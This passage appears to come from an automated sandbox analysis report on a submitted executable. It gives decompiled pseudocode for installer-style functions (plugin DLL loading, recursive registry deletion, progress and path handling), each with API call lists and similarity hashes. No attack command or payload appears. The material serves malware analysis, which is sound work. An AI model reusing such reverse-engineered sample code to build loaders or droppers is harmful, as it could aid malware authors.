                                                                      				} // 0x00403eb4
                                                                      				return _t49[3];
                                                                      			}


                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.229336526.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000001.00000002.229324634.0000000000400000.00000002.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229411654.0000000000407000.00000002.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229466151.0000000000409000.00000004.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229645583.000000000042C000.00000004.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229681609.0000000000435000.00000004.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229751992.0000000000438000.00000002.00020000.sdmp
                                                                      Similarity
                                                                      • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                      • String ID:
                                                                      • API String ID: 2320649405-0
                                                                      • Opcode ID: c97ffb24e4734704427e7b606a740b4fab5c3533c49fee8400ef737fc9d4ca7c
                                                                      • Instruction ID: 58e12d7a17a48f073ac0dc7c146c3fe23fb5e824e735bfcd0cbd4dbf4bd9f845
                                                                      • Opcode Fuzzy Hash: c97ffb24e4734704427e7b606a740b4fab5c3533c49fee8400ef737fc9d4ca7c
                                                                      • Instruction Fuzzy Hash: EE218471904744ABCB219F78DD08B4B7FFCAF00715B048A69E855E22E0D738EA04CB95
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 94%
                                                                      			E00404D69(CHAR* _a4, CHAR* _a8) {
                                                                      				struct HWND__* _v8;
                                                                      				signed int _v12;
                                                                      				CHAR* _v32;
                                                                      				long _v44;
                                                                      				int _v48;
                                                                      				void* _v52;
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				CHAR* _t26;
                                                                      				signed int _t27;
                                                                      				CHAR* _t28;
                                                                      				long _t29;
                                                                      				signed int _t39;
                                                                      
                                                                      				_t26 =  *0x42e804; // 0x00404d6f
                                                                      				_v8 = _t26; // 0x00404d7b
                                                                      				if(_t26 != 0) { // 0x00404d7e
                                                                      					_t27 =  *0x40928c; // 0x6, at 0x00404d84
                                                                      					_v12 = _t27; // 0x00404d90
                                                                      					_t39 = _t27 & 0x00000001; // 0x00404d93
                                                                      					if(_t39 == 0) { // 0x00404d96
                                                                      						E004059C6(0, _t39, 0x429c60, 0x429c60, _a4); // 0x00404d9c
                                                                      					} // 0x00404d9c
                                                                      					_t26 = lstrlenA(0x429c60); // 0x00404da2
                                                                      					_a4 = _t26; // 0x00404daa
                                                                      					if(_a8 == 0) { // 0x00404dad
                                                                      						L6: // 0x00404dca
                                                                      						if((_v12 & 0x00000004) != 0) { // 0x00404dce
                                                                      							_t26 = SetWindowTextA( *0x42e7e8, 0x429c60); // 0x00404dd7
                                                                      						} // 0x00404dd7
                                                                      						if((_v12 & 0x00000002) != 0) { // 0x00404de1
                                                                      							_v32 = 0x429c60; // 0x00404dea
                                                                      							_v52 = 1; // 0x00404df6
                                                                      							_t29 = SendMessageA(_v8, 0x1004, 0, 0); // 0x00404dfd
                                                                      							_v44 = 0; // 0x00404e01
                                                                      							_v48 = _t29 - _t39; // 0x00404e04
                                                                      							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52); // 0x00404e17
                                                                      							_t26 = SendMessageA(_v8, 0x1013, _v48, 0); // 0x00404e25
                                                                      						} // 0x00404e25
                                                                      						if(_t39 != 0) { // 0x00404e29
                                                                      							_t28 = _a4; // 0x00404e2b
                                                                      							 *((char*)(_t28 + 0x429c60)) = 0; // 0x00404e2e
                                                                      							return _t28;
                                                                      						} // 0x00404e2e
                                                                      					} else { // 0x00404daf
                                                                      						_t26 =  &(_a4[lstrlenA(_a8)]); // 0x00404db7
                                                                      						if(_t26 < 0x800) { // 0x00404dbf
                                                                      							_t26 = lstrcatA(0x429c60, _a8); // 0x00404dc5
                                                                      							goto L6;
                                                                      						} // 0x00404dc5
                                                                      					} // 0x00404dbf
                                                                      				} // 0x00404dad
                                                                      				return _t26; // 0x00404e38
                                                                      			}


                                                                      APIs
                                                                      • lstrlenA.KERNEL32(00429C60,00000000,0041A9FD,74B5EA30,?,?,?,?,?,?,?,?,?,0040300F,00000000,?), ref: 00404DA2
                                                                      • lstrlenA.KERNEL32(0040300F,00429C60,00000000,0041A9FD,74B5EA30,?,?,?,?,?,?,?,?,?,0040300F,00000000), ref: 00404DB2
                                                                      • lstrcatA.KERNEL32(00429C60,0040300F,0040300F,00429C60,00000000,0041A9FD,74B5EA30), ref: 00404DC5
                                                                      • SetWindowTextA.USER32(00429C60,00429C60), ref: 00404DD7
                                                                      • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404DFD
                                                                      • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404E17
                                                                      • SendMessageA.USER32(?,00001013,?,00000000), ref: 00404E25
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.229336526.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000001.00000002.229324634.0000000000400000.00000002.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229411654.0000000000407000.00000002.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229466151.0000000000409000.00000004.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229645583.000000000042C000.00000004.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229681609.0000000000435000.00000004.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229751992.0000000000438000.00000002.00020000.sdmp
                                                                      Similarity
                                                                      • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                      • String ID:
                                                                      • API String ID: 2531174081-0
                                                                      • Opcode ID: affc104c252ae17fd0e997cd29e1146603040f74c7626340a325fc6ea0e747b1
                                                                      • Instruction ID: 92468eaa65ab5e9d2da8b894f350d876ca08d4ce6a9febd395d245304a04307e
                                                                      • Opcode Fuzzy Hash: affc104c252ae17fd0e997cd29e1146603040f74c7626340a325fc6ea0e747b1
                                                                      • Instruction Fuzzy Hash: B72160B1901118BADF119FA5CD859DEBFB9EF44354F04807AF544B6290C7794E40CBA8
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E00405BD3(CHAR* _a4) {
                                                                      				char _t5;
                                                                      				char _t7;
                                                                      				char* _t15;
                                                                      				char* _t16;
                                                                      				CHAR* _t17;
                                                                      
                                                                      				_t17 = _a4; // 0x00405bd5
                                                                      				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) { // 0x00405bdd
                                                                      					_t17 =  &(_t17[4]); // 0x00405bf1
                                                                      				} // 0x00405bf1
                                                                      				if( *_t17 != 0 && E00405509(_t17) != 0) { // 0x00405bf7
                                                                      					_t17 =  &(_t17[2]); // 0x00405c04
                                                                      				} // 0x00405c04
                                                                      				_t5 =  *_t17; // 0x00405c05
                                                                      				_t15 = _t17; // 0x00405c07
                                                                      				_t16 = _t17; // 0x00405c0b
                                                                      				if(_t5 != 0) { // 0x00405c0d
                                                                      					do { // 0x00405c16
                                                                      						if(_t5 > 0x1f &&  *((char*)(E004054C8("*?|<>/\":", _t5))) == 0) { // 0x00405c18
                                                                      							E00405641(_t16, _t17, CharNextA(_t17) - _t17); // 0x00405c32
                                                                      							_t16 = CharNextA(_t16); // 0x00405c3a
                                                                      						} // 0x00405c3a
                                                                      						_t17 = CharNextA(_t17); // 0x00405c3f
                                                                      						_t5 =  *_t17; // 0x00405c41
                                                                      					} while (_t5 != 0); // 0x00405c43
                                                                      				} // 0x00405c47
                                                                      				 *_t16 =  *_t16 & 0x00000000; // 0x00405c48
                                                                      				while(1) { // 0x00405c4b
                                                                      					_t16 = CharPrevA(_t15, _t16); // 0x00405c53
                                                                      					_t7 =  *_t16; // 0x00405c55
                                                                      					if(_t7 != 0x20 && _t7 != 0x5c) { // 0x00405c59
                                                                      						break;
                                                                      					}
                                                                      					 *_t16 =  *_t16 & 0x00000000; // 0x00405c5f
                                                                      					if(_t15 < _t16) { // 0x00405c64
                                                                      						continue;
                                                                      					}
                                                                      					break;
                                                                      				} // 0x00405c64
                                                                      				return _t7; // 0x00405c69
                                                                      			}


                                                                      APIs
                                                                      • CharNextA.USER32(?,*?|<>/":,00000000,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403135,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\aaVb1xEmrd.exe" ,0040328E), ref: 00405C2B
                                                                      • CharNextA.USER32(?,?,?,00000000,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403135,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\aaVb1xEmrd.exe" ,0040328E), ref: 00405C38
                                                                      • CharNextA.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403135,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\aaVb1xEmrd.exe" ,0040328E), ref: 00405C3D
                                                                      • CharPrevA.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403135,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\aaVb1xEmrd.exe" ,0040328E), ref: 00405C4D
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.229336526.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000001.00000002.229324634.0000000000400000.00000002.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229411654.0000000000407000.00000002.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229466151.0000000000409000.00000004.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229645583.000000000042C000.00000004.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229681609.0000000000435000.00000004.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229751992.0000000000438000.00000002.00020000.sdmp
                                                                      Similarity
                                                                      • API ID: Char$Next$Prev
                                                                      • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                      • API String ID: 589700163-2982765560
                                                                      • Opcode ID: 9e58ff8809a7c7a12694b45d6a4332c54744f2b66e8e9de4fda5420d35e2781e
                                                                      • Instruction ID: e583e1b1d98595a14f3c28bd186b9eb51b7c0ef9f5ba4087d3cb4cd7b15a2251
                                                                      • Opcode Fuzzy Hash: 9e58ff8809a7c7a12694b45d6a4332c54744f2b66e8e9de4fda5420d35e2781e
                                                                      • Instruction Fuzzy Hash: 8E11B251808B9529FB3216280D44BBB7F98CF57760F18047BE5C5722C2D67CAC829F6D
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			// Tree-view helper: returns the lParam of the selected item, or (when _a8 != 0)
                                                                      			// of the item under the mouse cursor; returns -1 when the cursor hits no item.
                                                                      			E00404638(struct HWND__* _a4, intOrPtr _a8) {
                                                                      				long _v8;           // TVHITTESTINFO.hItem
                                                                      				signed char _v12;   // TVHITTESTINFO.flags
                                                                      				unsigned int _v16;  // TVHITTESTINFO.pt.y
                                                                      				void* _v20;         // TVHITTESTINFO.pt.x
                                                                      				intOrPtr _v24;      // TVITEM.lParam
                                                                      				long _v56;          // TVITEM.hItem
                                                                      				void* _v60;         // TVITEM.mask
                                                                      				long _t15;
                                                                      				unsigned int _t19;
                                                                      				signed int _t25;
                                                                      				struct HWND__* _t28;
                                                                      
                                                                      				_t28 = _a4;
                                                                      				_t15 = SendMessageA(_t28, 0x110a, 9, 0); // TVM_GETNEXTITEM, TVGN_CARET: currently selected item
                                                                      				if(_a8 == 0) {
                                                                      					L4:
                                                                      					_v56 = _t15; // TVITEM.hItem
                                                                      					_v60 = 4;    // TVITEM.mask = TVIF_PARAM
                                                                      					SendMessageA(_t28, 0x110c, 0,  &_v60); // TVM_GETITEMA
                                                                      					return _v24; // TVITEM.lParam
                                                                      				}
                                                                      				_t19 = GetMessagePos(); // packed screen coordinates: x in the low word, y in the high word
                                                                      				_v16 = _t19 >> 0x10;
                                                                      				_v20 = _t19;
                                                                      				ScreenToClient(_t28,  &_v20);
                                                                      				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20); // TVM_HITTEST with the TVHITTESTINFO at _v20
                                                                      				if((_v12 & 0x00000066) != 0) { // TVHT_ONITEM* flags: the cursor is over an item
                                                                      					_t15 = _v8; // hit item handle
                                                                      					goto L4;
                                                                      				}
                                                                      				return _t25 | 0xffffffff; // -1: nothing hit
                                                                      			}

                                                                      APIs
                                                                      • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 00404653
                                                                      • GetMessagePos.USER32 ref: 0040465B
                                                                      • ScreenToClient.USER32 ref: 00404675
                                                                      • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404687
                                                                      • SendMessageA.USER32(?,0000110C,00000000,?), ref: 004046AD
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.229336526.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000001.00000002.229324634.0000000000400000.00000002.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229411654.0000000000407000.00000002.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229466151.0000000000409000.00000004.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229645583.000000000042C000.00000004.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229681609.0000000000435000.00000004.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229751992.0000000000438000.00000002.00020000.sdmp
                                                                      Similarity
                                                                      • API ID: Message$Send$ClientScreen
                                                                      • String ID: f
                                                                      • API String ID: 41195575-1993550816
                                                                      • Opcode ID: 8939a733ac818a857620fb03d083872b00868bc922679df8549fd600b0bd897d
                                                                      • Instruction ID: 4d8a51df142dfa575a30cd399ea29616324454f4b00b7c41faff93775b70e16f
                                                                      • Opcode Fuzzy Hash: 8939a733ac818a857620fb03d083872b00868bc922679df8549fd600b0bd897d
                                                                      • Instruction Fuzzy Hash: 90015271D00218BADB00DB94DC85BFFBBFCAB55711F10416BBB00B62D0D7B869458BA5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 65%
                                                                      			// Loads a DLL by path (or reuses an already-loaded module), resolves an export
                                                                      			// by name with GetProcAddress and calls it. Both the module path (_t35) and the
                                                                      			// export name (*(_t37 + 8)) come from the string helper E00402A9D.
                                                                      			E00401FD6(int __ebx) {
                                                                      				int _t28;
                                                                      				struct HINSTANCE__* _t33;
                                                                      				CHAR* _t35;
                                                                      				intOrPtr* _t36;
                                                                      				void* _t37;
                                                                      
                                                                      				_t28 = __ebx;
                                                                      				 *(_t37 - 4) = 1;
                                                                      				SetErrorMode(0x8001); // SEM_FAILCRITICALERRORS | SEM_NOOPENFILEERRORBOX: suppress error dialogs
                                                                      				if( *0x42f0d0 < __ebx) {
                                                                      					_push(0xffffffe7);
                                                                      					goto L14;
                                                                      				} else {
                                                                      					_t35 = E00402A9D(0xfffffff0);      // module path
                                                                      					 *(_t37 + 8) = E00402A9D(1);       // export name
                                                                      					if( *((intOrPtr*)(_t37 - 0x14)) == __ebx) {
                                                                      						L3:
                                                                      						_t33 = LoadLibraryExA(_t35, _t28, 8); // 8 = LOAD_WITH_ALTERED_SEARCH_PATH
                                                                      						if(_t33 == _t28) {
                                                                      							_push(0xfffffff6);
                                                                      							L14:
                                                                      							E00401428(); // error path: module could not be loaded
                                                                      						} else {
                                                                      							goto L4;
                                                                      						}
                                                                      					} else {
                                                                      						_t33 = GetModuleHandleA(_t35); // try an already-loaded module first
                                                                      						if(_t33 != __ebx) {
                                                                      							L4:
                                                                      							_t36 = GetProcAddress(_t33,  *(_t37 + 8));
                                                                      							if(_t36 == _t28) {
                                                                      								E00404D69(0xfffffff7,  *(_t37 + 8)); // error path: export not found
                                                                      							} else {
                                                                      								 *(_t37 - 4) = _t28;
                                                                      								if( *((intOrPtr*)(_t37 - 0x1c)) == _t28) {
                                                                      									// call the export with five fixed arguments (a plugin-style calling convention)
                                                                      									 *_t36( *((intOrPtr*)(_t37 - 8)), 0x400, 0x430000, 0x40afe8, 0x409000);
                                                                      								} else {
                                                                      									E00401428( *((intOrPtr*)(_t37 - 0x1c)));
                                                                      									if( *_t36() != 0) { // call the export without arguments
                                                                      										 *(_t37 - 4) = 1;
                                                                      									}
                                                                      								}
                                                                      							}
                                                                      							if( *((intOrPtr*)(_t37 - 0x18)) == _t28) {
                                                                      								FreeLibrary(_t33); // unload unless the caller asked to keep the module
                                                                      							}
                                                                      						} else {
                                                                      							goto L3;
                                                                      						}
                                                                      					}
                                                                      				}
                                                                      				SetErrorMode(_t28); // restore the previous error mode
                                                                      				 *0x42f0a8 =  *0x42f0a8 +  *(_t37 - 4);
                                                                      				return 0;
                                                                      			}

                                                                      APIs
                                                                      • SetErrorMode.KERNEL32(00008001), ref: 00401FE1
                                                                      • GetModuleHandleA.KERNEL32(00000000,00000001,000000F0), ref: 0040200B
                                                                        • Part of subcall function 00404D69: lstrlenA.KERNEL32(00429C60,00000000,0041A9FD,74B5EA30,?,?,?,?,?,?,?,?,?,0040300F,00000000,?), ref: 00404DA2
                                                                        • Part of subcall function 00404D69: lstrlenA.KERNEL32(0040300F,00429C60,00000000,0041A9FD,74B5EA30,?,?,?,?,?,?,?,?,?,0040300F,00000000), ref: 00404DB2
                                                                        • Part of subcall function 00404D69: lstrcatA.KERNEL32(00429C60,0040300F,0040300F,00429C60,00000000,0041A9FD,74B5EA30), ref: 00404DC5
                                                                        • Part of subcall function 00404D69: SetWindowTextA.USER32(00429C60,00429C60), ref: 00404DD7
                                                                        • Part of subcall function 00404D69: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404DFD
                                                                        • Part of subcall function 00404D69: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404E17
                                                                        • Part of subcall function 00404D69: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404E25
                                                                      • LoadLibraryExA.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040201B
                                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 0040202B
                                                                      • FreeLibrary.KERNEL32(00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 00402084
                                                                      • SetErrorMode.KERNEL32 ref: 00402098
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.229336526.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000001.00000002.229324634.0000000000400000.00000002.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229411654.0000000000407000.00000002.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229466151.0000000000409000.00000004.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229645583.000000000042C000.00000004.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229681609.0000000000435000.00000004.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229751992.0000000000438000.00000002.00020000.sdmp
                                                                      Similarity
                                                                      • API ID: MessageSend$ErrorLibraryModelstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                                      • String ID:
                                                                      • API String ID: 1609199483-0
                                                                      • Opcode ID: e1aae45f44c4ebed3ed36172859ca6a2ad49075dd00bb9d840c681027f18f838
                                                                      • Instruction ID: 57f493d9fc40383ab318066455ce7b931c156c6844e967600fdf6a810a89660c
                                                                      • Opcode Fuzzy Hash: e1aae45f44c4ebed3ed36172859ca6a2ad49075dd00bb9d840c681027f18f838
                                                                      • Instruction Fuzzy Hash: 4821C971D04325EBCB306FA5CF4996E7AB0AB44355F20417BF711B62E0C7B84941DA5E
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			// Progress dialog procedure: on WM_INITDIALOG it starts a 250 ms timer and stores
                                                                      			// a title format string; on every WM_TIMER it writes the completion percentage
                                                                      			// into the window title and dialog item 0x406 and shows the window.
                                                                      			E00402BAE(struct HWND__* _a4, intOrPtr _a8, CHAR* _a16) {
                                                                      				int _t7;
                                                                      				int _t15;
                                                                      				struct HWND__* _t16;
                                                                      
                                                                      				_t16 = _a4;
                                                                      				if(_a8 == 0x110) { // WM_INITDIALOG
                                                                      					SetTimer(_t16, 1, 0xfa, 0); // timer id 1, 250 ms
                                                                      					_a8 = 0x113; // fall through to the WM_TIMER handling below
                                                                      					 *0x40b028 = _a16; // wsprintf format string for the title
                                                                      				}
                                                                      				if(_a8 == 0x113) { // WM_TIMER
                                                                      					_t15 =  *0x414c30; // 0xcbdc3  bytes processed
                                                                      					_t7 =  *0x428c38; // 0xcbdc7   total bytes
                                                                      					if(_t15 >= _t7) {
                                                                      						_t15 = _t7; // clamp to 100%
                                                                      					}
                                                                      					wsprintfA(0x414bf0,  *0x40b028, MulDiv(_t15, 0x64, _t7)); // percentage = done * 100 / total
                                                                      					SetWindowTextA(_t16, 0x414bf0);
                                                                      					SetDlgItemTextA(_t16, 0x406, 0x414bf0);
                                                                      					ShowWindow(_t16, 5); // SW_SHOW
                                                                      				}
                                                                      				return 0;
                                                                      			}

                                                                      APIs
                                                                      • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402BCE
                                                                      • MulDiv.KERNEL32(000CBDC3,00000064,000CBDC7), ref: 00402BF9
                                                                      • wsprintfA.USER32 ref: 00402C0C
                                                                      • SetWindowTextA.USER32(?,00414BF0), ref: 00402C17
                                                                      • SetDlgItemTextA.USER32 ref: 00402C24
                                                                      • ShowWindow.USER32(?,00000005,?,00000406,00414BF0), ref: 00402C2C
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.229336526.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000001.00000002.229324634.0000000000400000.00000002.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229411654.0000000000407000.00000002.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229466151.0000000000409000.00000004.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229645583.000000000042C000.00000004.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229681609.0000000000435000.00000004.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229751992.0000000000438000.00000002.00020000.sdmp
                                                                      Similarity
                                                                      • API ID: TextWindow$ItemShowTimerwsprintf
                                                                      • String ID:
                                                                      • API String ID: 559026099-0
                                                                      • Opcode ID: 91ef1b36f5720515517a90dcf963e1e16e0f439d891600b78cf102efee8e2b64
                                                                      • Instruction ID: 7d05f416cde50b6084005c706393f5427f21405d9f934a2ccac42c904c2f386d
                                                                      • Opcode Fuzzy Hash: 91ef1b36f5720515517a90dcf963e1e16e0f439d891600b78cf102efee8e2b64
                                                                      • Instruction Fuzzy Hash: 6D018871A44214BBD7209F15AD49FFF3768EB45721F008039FA09B62D0DB78A8519FAD
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			// Recursive registry key deletion. With _a12 != 0 the function only probes:
                                                                      			// it returns 1 as soon as the key has a subkey and deletes nothing. With
                                                                      			// _a12 == 0 it deletes every subkey (recursively) and then the key itself.
                                                                      			E00402ADD(void* _a4, char* _a8, intOrPtr _a12) {
                                                                      				void* _v8;     // opened key handle
                                                                      				char _v272;    // subkey name buffer (0x105 bytes)
                                                                      				long _t14;
                                                                      
                                                                      				_t14 = RegOpenKeyExA(_a4, _a8, 0, 8,  &_v8); // 8 = KEY_ENUMERATE_SUB_KEYS
                                                                      				if(_t14 == 0) {
                                                                      					// always index 0: each deleted subkey shifts the next one into slot 0
                                                                      					while(RegEnumKeyA(_v8, 0,  &_v272, 0x105) == 0) {
                                                                      						if(_a12 != 0) {
                                                                      							RegCloseKey(_v8);
                                                                      							return 1; // probe mode: subkey present
                                                                      						}
                                                                      						if(E00402ADD(_v8,  &_v272, 0) != 0) {
                                                                      							break; // a subkey could not be deleted; give up on this key
                                                                      						}
                                                                      					}
                                                                      					RegCloseKey(_v8);
                                                                      					return RegDeleteKeyA(_a4, _a8);
                                                                      				}
                                                                      				return _t14; // RegOpenKeyExA error code
                                                                      			}

                                                                      APIs
                                                                      • RegOpenKeyExA.ADVAPI32(?,?,00000000,00000008,?), ref: 00402AF8
                                                                      • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402B34
                                                                      • RegCloseKey.ADVAPI32(?), ref: 00402B3D
                                                                      • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402B49
                                                                      • RegCloseKey.ADVAPI32(?), ref: 00402B59
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.229336526.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.229324634.0000000000400000.00000002.00020000.sdmp
• Associated: 00000001.00000002.229411654.0000000000407000.00000002.00020000.sdmp
• Associated: 00000001.00000002.229466151.0000000000409000.00000004.00020000.sdmp
• Associated: 00000001.00000002.229645583.000000000042C000.00000004.00020000.sdmp
• Associated: 00000001.00000002.229681609.0000000000435000.00000004.00020000.sdmp
• Associated: 00000001.00000002.229751992.0000000000438000.00000002.00020000.sdmp
                                                                      Similarity
                                                                      • API ID: Close$DeleteEnumOpen
                                                                      • String ID:
                                                                      • API String ID: 1912718029-0
                                                                      • Opcode ID: 781eaa9db69f21ef601ca1d4776a4c1391036b525708d9e88c61fa299770da92
                                                                      • Instruction ID: 43845d972939b32c8459b9529feec676c881337d2958cd618b714e39fea56b76
                                                                      • Opcode Fuzzy Hash: 781eaa9db69f21ef601ca1d4776a4c1391036b525708d9e88c61fa299770da92
                                                                      • Instruction Fuzzy Hash: 36016932900108FBDB21AF90DE88DAF7B3DEB44384F104172BA01A10A0D7B0AE55AA65
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E00401D2C() {
                                                                      				void* _t18;
                                                                      				struct HINSTANCE__* _t22;
                                                                      				struct HWND__* _t25;
                                                                      				void* _t27;
                                                                      
                                                                      				_t25 = GetDlgItem( *(_t27 - 8),  *(_t27 - 0x20));
                                                                      				GetClientRect(_t25, _t27 - 0x40);
                                                                      				_t18 = SendMessageA(_t25, 0x172, _t22, LoadImageA(_t22, E00402A9D(_t22), _t22,  *(_t27 - 0x38) *  *(_t27 - 0x1c),  *(_t27 - 0x34) *  *(_t27 - 0x1c), 0x10));
                                                                      				if(_t18 != _t22) {
                                                                      					DeleteObject(_t18);
                                                                      				}
                                                                      				 *0x42f0a8 =  *0x42f0a8 +  *((intOrPtr*)(_t27 - 4));
                                                                      				return 0;
                                                                      			}

                                                                      APIs
                                                                      • GetDlgItem.USER32 ref: 00401D32
                                                                      • GetClientRect.USER32 ref: 00401D3F
                                                                      • LoadImageA.USER32 ref: 00401D60
                                                                      • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D6E
                                                                      • DeleteObject.GDI32(00000000), ref: 00401D7D
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.229336526.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.229324634.0000000000400000.00000002.00020000.sdmp
• Associated: 00000001.00000002.229411654.0000000000407000.00000002.00020000.sdmp
• Associated: 00000001.00000002.229466151.0000000000409000.00000004.00020000.sdmp
• Associated: 00000001.00000002.229645583.000000000042C000.00000004.00020000.sdmp
• Associated: 00000001.00000002.229681609.0000000000435000.00000004.00020000.sdmp
• Associated: 00000001.00000002.229751992.0000000000438000.00000002.00020000.sdmp
                                                                      Similarity
                                                                      • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                      • String ID:
                                                                      • API String ID: 1849352358-0
                                                                      • Opcode ID: b02376979bedd074853e5fbf5c326cf524b223cbbd13035aea6afd2f9c465352
                                                                      • Instruction ID: ae89fa22d0436c8bef1e03633192d5cad9c1ad8ea06547c970e0648154d4d9e2
                                                                      • Opcode Fuzzy Hash: b02376979bedd074853e5fbf5c326cf524b223cbbd13035aea6afd2f9c465352
                                                                      • Instruction Fuzzy Hash: FCF0ECB2A04119BFDB01DBA4EE88DAF77BCEB14301B000475F601F61A1C6789D428B69
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 35%
                                                                      			E00404556(int _a4, intOrPtr _a8, unsigned int _a12) {
                                                                      				char _v36;
                                                                      				char _v68;
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				void* _t26;
                                                                      				void* _t34;
                                                                      				signed int _t36;
                                                                      				signed int _t39;
                                                                      				unsigned int _t46;
                                                                      
                                                                      				_t46 = _a12;
                                                                      				_push(0x14);
                                                                      				_pop(0);
                                                                      				_t34 = 0xffffffdc;
                                                                      				if(_t46 < 0x100000) {
                                                                      					_push(0xa);
                                                                      					_pop(0);
                                                                      					_t34 = 0xffffffdd;
                                                                      				}
                                                                      				if(_t46 < 0x400) {
                                                                      					_t34 = 0xffffffde;
                                                                      				}
                                                                      				if(_t46 < 0xffff3333) {
                                                                      					_t39 = 0x14;
                                                                      					asm("cdq");
                                                                      					_t46 = _t46 + 1 / _t39;
                                                                      				}
                                                                      				_push(E004059C6(_t34, 0, _t46,  &_v36, 0xffffffdf));
                                                                      				_push(E004059C6(_t34, 0, _t46,  &_v68, _t34));
                                                                      				_t21 = _t46 & 0x00ffffff;
                                                                      				_t36 = 0xa;
                                                                      				_push(((_t46 & 0x00ffffff) + _t21 * 4 + (_t46 & 0x00ffffff) + _t21 * 4 >> 0) % _t36);
                                                                      				_push(_t46 >> 0);
                                                                      				_t26 = E004059C6(_t34, 0, 0x42a488, 0x42a488, _a8);
